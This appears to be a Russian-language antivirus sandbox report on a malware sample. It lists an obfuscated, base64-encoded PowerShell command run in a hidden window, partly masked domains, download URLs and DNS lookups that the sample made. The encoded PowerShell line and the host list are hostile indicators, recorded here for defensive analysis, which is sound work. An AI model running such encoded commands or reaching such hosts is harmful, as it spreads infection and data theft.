Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1436
- %TEMP%\771050.cvr
- 'yd##in.fun':80
- 'ga##x.eu':80
- 'on###six.com':80
- 'pe####tdomain.com':443
- 'pk#.goog':80
- 'vi#.##zhiguoren.com':80
- 'ye###itruong.vn':443
- 'gr####studio.com':80
- 'gr####studio.com':443
- 'is####hnology.com':443
- http://yd##in.fun/wp-includes/J2gtP7rvBA/
- http://ga##x.eu/001_elemei/mg9/
- http://on###six.com/test/fPF2zBUI/
- http://pk#.goog/gsr1/gsr1.crt
- http://www.gr####studio.com/docs/5fTKVT/
- 'pe####tdomain.com':443
- 'ye###itruong.vn':443
- 'gr####studio.com':443
- 'is####hnology.com':443
- DNS ASK yd##in.fun
- DNS ASK ga##x.eu
- DNS ASK on###six.com
- DNS ASK pe####tdomain.com
- DNS ASK pk#.goog
- DNS ASK vi#.##zhiguoren.com
- DNS ASK ye###itruong.vn
- DNS ASK gr####studio.com
- DNS ASK is####hnology.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -en JABGAGYAegByADQANwBmAD0AKAAnAEgAJwArACgAJwAzAGQAeQByACcAKwAnAGkAcgAnACkAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgB2ADoAdQBzAEUAUgBwAFIAbwBGAGkAbABFAFwAUgA0AGUANABTA... (со скрытым окном)